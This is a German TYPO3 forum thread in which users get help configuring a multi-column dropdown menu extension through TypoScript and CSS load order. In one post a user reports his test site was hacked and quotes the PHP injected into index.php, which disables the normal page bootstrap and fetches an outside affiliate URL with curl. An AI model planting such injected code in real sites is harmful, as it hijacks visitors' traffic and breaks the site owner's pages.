Zum Inhalt springen

Typoscript für Mega Dropdown Menu

Erstellt am 18. Januar 2010 · 69 Antworten · letzte Antwort am 14. November 2013 · Seite 1 von 4

Tags: Frage

jank ·

Moin! ich empfehle ohne spacer zu arbeiten weil du von denen meines wissens keinen inhalt vererben kannst...

als struktur empfehle ich normale seiten

Level1 ESSEN
---Level2 Obst
------Level3 Äpfel
------Birnen
---Level2 GEMÜSE
------Level3 Mören
Wichtig ist eben das du die css Klassen änderst

lib.nav.10.1.wrap = <ul class="dropdown dropdown-linear dropdown-columnar"> | </ul>

und die css Datei lädst

page.includeCss.file1234 = typo3conf/ext/freecssdropdownmenu/res/css/dropdown/dropdown.linear.columnar.css

Ich schau, dass ich das in die nächste Version des Menüs mit einbeziehe (vermutlich diese Woche)...
Das Menü bringt recht viele Möglichkeiten mit die ich noch nicht alle realisiert habe...

skydivematy ·

Hallo Jank,
sorry das ich mich so spät erst melde, hatte wenig Zeit.
Ok. Habe den Fehler gefunden warum es nicht funktionierte.

Es lag daran, dass ich nur die default.advanced.css aus dem folder lwis.celebrity per headerdata eingebunden hatte.

Du hattest mich ja schon einige male auf

page.includeCss.file1234 = typo3conf/ext/freecssdropdownmenu/res/css/dropdown/dropdown.linear.columnar.css

Hingewiesen, hatte jedoch Tomaten auf den Augen. :o

Mein Jetziges Setup sieht folgendermaßen aus:

page.headerData.10 = TEXT
page.headerData.10.value (
<link href="fileadmin/styles/gc_site/zero_col/css/zero_col.css" rel="stylesheet" type="text/css" />
<link href="fileadmin/styles/gc_site/zero_col/css/navigation/celebrity/default.advanced.css" rel="stylesheet" type="text/css" />
<link href="fileadmin/styles/gc_site/zero_col/css/navigation/celebrity/dropdown.linear.columnar.css" rel="stylesheet" type="text/css" />
)

Setup

lib.nav = COA
lib.nav.10  < plugin.freeCssDropDownMenu.horizontal
lib.nav.10.1.wrap = <ul class="dropdown dropdown-linear dropdown-columnar"> | </ul>
lib.nav.10.1.IFSUB.doNotLinkIt = 1
lib.nav.10.2.IFSUB.doNotLinkIt = 1
lib.nav.10.2.entryLevel = 1
lib.nav.10.2.expAll = 1
lib.nav.10.4 >
lib.nav.10.5 >

So funzt es genau wie ich es haben wollte.
Perfekt.

Werde dir den Link der Seite dann mal per PM senden wenn sie fertig ist.
Und natührlich ein GROSSES DANKE für die kleine aber feine Extension...
:p

gruß
maty

jank ·

Hallo skydivematy,
schön dass es geklappt hat. ich werde dieses menü noch in die nächte version mit einbauen...

Danke für den Hinweiß auf die fehlende Funktion.
Ich schau mir die Seite gerne mal an.

Bis dann

LucitheR ·

Hallo, ich finde die CSS Menüs klasse, daher war ich angenehm überrascht, festzustellen das es eine Typo3 Portierung gibt. Nur leider bin ich zu doof sie einzubauen 🙁
Vielleicht liegt das ja an der Seitenstruktur habe die ich aufbauen musste...

TS-Template
--Home (Shortcut auf webhosting)
---Webhosting
---- Deutschland
----...
----...
--- Zweiter Menüpunkt
---- ...
---- ...

Mein TS sieht dann mal so aus (schamlos aus diesem thread geklaut ^^):

lib.mainMenu = COA
lib.mainMenu.10  < plugin.freeCssDropDownMenu.horizontal
lib.mainMenu.10.1.wrap = <ul class="dropdown dropdown-linear dropdown-columnar"> | </ul>
lib.mainMenu.10.2.IFSUB.doNotLinkIt = 1
lib.mainMenu.10.2.SPC = 1
lib.mainMenu.10.2.SPC.doNotShowLink = 0
lib.mainMenu.10.2.SPC.doNotLinkIt = 1
lib.mainMenu.10.4 >
lib.mainMenu.10.5 >

angezeigt wird gar nichts 🙁

so ganz steige ich da grad nicht durch... gibt das eigentlich irgendwo ein howto? ein Manual ist ja leider nicht dabei... oder besser noch, was mache ich falsch?

grüße Jan

LucitheR ·

ich vergass zu erwähnen ich benutze Typo3 4.4.5 und grade habe ich gesehen das das plugin nnicht im Typoscript Object Browser zu sehen ist. 🙁

LucitheR ·
jank schrieb

Hast du es denn in deinem Template im bereich include static ausgewählt?

ja ist ausgewählt, mittlerweile auch im Objektbrowser zu sehen, war wohl einfach ein Cachingproblem meines Firefox... aber zu sehen ist es immer noch nicht. auch nicht im Quellcode der Website.

Gibt das denn irgendwo eine Möglichkeit den Level anzugeben, ab welcher die Seiten gerendert werden sollen?

Wenn ich ein herkömmliches Menü wähle wird es auch korrekt im richtigen div-tag angezeigt, also ist der Objektpfad richtig.Im Templateanalyser wird das plugin in grün dargestellt, was wenn ich richtig liege, ja heisst das es ignoriert wird (siehe Screenshot).. #angry#

Bildschirmfoto-2011-01-18-um-09.34.38.png

jank ·

Die Start ID kannst du in den constants angeben, genauso wie eventuelle excludes:

plugin.freeCssDropDownMenu.horizontal.start = xx
plugin.freeCssDropDownMenu.horizontal.exclude =

Start ist per default die ID 1, wenn es die bei dir nicht gibt wird auch kein Menü generiert.

Ich gebe zu ich muss die Doku mal fertigstellen :o

LucitheR ·
jank schrieb

Die Start ID kannst du in den constants angeben, genauso wie eventuelle excludes:

plugin.freeCssDropDownMenu.horizontal.start = xx
plugin.freeCssDropDownMenu.horizontal.exclude =

Start ist per default die ID 1, wenn es die bei dir nicht gibt wird auch kein Menü generiert.

Ich gebe zu ich muss die Doku mal fertigstellen :o

genau diese Info fehlte 😉
nun funktioniert es alles 😃

vielen Dank
Jan

jank ·

auch wieder über die constants:

plugin.freeCssDropDownMenu.themeCss = typo3conf/ext/freecssdropdownmenu/res/css/dropdown/themes/_template/default.css
Dennis.​D ·

Hallo Zusammen,
ich hoffe es liest hier noch einer mit und mir ist es auch etwas unangenehm das ich das Menü trotz so vieler Antworten noch nicht auf die Reihe bekommen habe.

Mein Ziel: So wie in dem Celebrity Bsp, ein Menü mit mehreren Spalten nebeneinander, so das man gleich einen schönen Überblick über die Unterseiten bekommt.
Die Unterseiten des Menüs sollen nicht Ebene für Ebene nacheinander auftauchen wenn man mit der Maus drüber fährt, sondern gleich wenn ich den ersten Menüpunkt auswähle soll darunter die mehrspaltige Liste auftauchen. Ebenso wie in dem Beispiel.

Das "geklaute" TS:

temp.nav = COA
temp.nav.10  < plugin.freeCssDropDownMenu.horizontal
temp.nav.10.1.wrap = <ul class="dropdown dropdown-linear dropdown-columnar"> | </ul>
temp.nav.10.1.IFSUB.doNotLinkIt = 1
temp.nav.10.1.expAll = 1
temp.nav.10.2.IFSUB.doNotLinkIt = 1
temp.nav.10.2.entryLevel = 1
temp.nav.10.2.expAll = 1
temp.nav.10.4 >
temp.nav.10.5 >
page.10.subparts.main_nav < temp.nav

page.headerData.100 = TEXT
page.headerData.100.value (
<link href="fileadmin/template/css/default.advanced.css" rel="stylesheet" type="text/css" />
<link href="typo3conf/ext/freecssdropdownmenu/res/css/dropdown.linear.columnar.css" rel="stylesheet" type="text/css" />
)

Und hier mal der link zur Seite auf der ich das gerade ausprobiere: http://4mamis.diekavallerie.de.www68.your-server.de/

Bin um jeden Tipp dankbar.

LG Dennis

jank ·

Das Problem ist die Reihenfolge der CSS Dateien.

Die Dateien überschreiben der Reihe nach einige Einstellungen und wenn die Reihenfolge falsch ist überschreibt die letzte Datei die Einstellungen der vorherigen.

Hier die Reihenfolge:
dropdown.css
dropdown.linear.columnar.css
default.advanced.css

Und das Theme css unbedingt nach fileadmin kopieren, da es sonst bei einem Update überschrieben wird.

Dennis.​D ·

Gute Morgen,

erstmal vielen Dank für die schnelle Antwort. Ich werde das gleich mal ausprobieren.

Ich musste gerade leider mit entsetzen feststellen das die Seite die ich gestern Abend aufgesetzt habe, und deren link ich hier gepostet habe, gehackt wurde!

Folgenden Eintrag konnte ich im Log finden:
20:44:54 dennis@-99 LOGIN LOGIN User dennis logged in from 109.192.130.226 () (msg#255.1.1)
20:44:34 [0]@LIVE [5] Sys! [5_0] Core: Exception handler (WEB): Uncaught TYPO3 Exception: Reason: Segment &quot;favicon.ico&quot; was not a keyword for a postVarSet as expected! | RuntimeException thrown in file /xx/xxx/xxx/xxx/4mamis/typo3_src-4.5.0/typo3/sysext/cms/tslib/class.tslib_fe.php in line 1572

Ich weiss nich ob jemand damit was anfangen kann. Anscheinend hat jemand meinen BE Account geknackt und hat sich dann damit um 20.44 Uhr eingeloggt.

Die index.php war auch verändert, hiermit:

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.benaughty.com/aff.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
#require (PATH_tslib.'index_ts.php');
curl_exec($ch);
curl_close($ch);

Könnte das ein TYPO3 bug in der neuen Version sein, oder habe ich einfach Pech und sollte hier solche links nicht mehr posten?

Danke euch schon mal.

jank ·

hm... ich war es nicht. Aber ist schon komisch. Aber eigentlich kann es fast kein Typo3 Bug sein, da aus Typo3 die index.php zu modifizieren recht schwer sein dürfte. Vielleicht war der ganze Server betroffen...
Das hatte ich vor kurzem auch bei einem Kunden... Da hat der Hoster einfach sch... gebaut.
Den Ordner typo3_src sollte man am besten auch nicht vom Webserver beschreibbar machen, außer du willst wirklich am Quelltext von Typo3 etwas ändern.

jank ·

Die Reihenfolge der CSS Dateien Stimmt immer noch nicht
Momentan:

<link href="/fileadmin/template/css/dropdown.css" rel="stylesheet" type="text/css" />
<link href="/fileadmin/template/css/dropdown.linear.columnar.css" rel="stylesheet" type="text/css" />
<link href="/fileadmin/template/css/default.advanced.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/dropdown.css" /><link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/themes/_template/default.css" />

Da must Du die Reihenfolge beachten, wie ich es im vorherigen Post geschrieben habe.
Bei dir überschreibt die dropdown.css die Eigenschaften der default.advanced.css und dropdown.linear.columnar.css wieder, da sie noch mal an vorletzter Stelle steht.

Dennis.​D ·

Ich steh immer noch auf dem Schlauch... Die letzte Zeile:

<link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/dropdown.css" /><link rel="stylesheet" type="text/css" href="/typo3conf/ext/freecssdropdownmenu/res/css/dropdown/themes/_template/default.css" />

wird ja anscheinend aus der Extension geladen. Ich habe das so nicht im TS stehen. Wie kann ich das abstellen? Egal wie ich die Reihenfolge änder, diese Zeile taucht immer als letztes auf. #angry#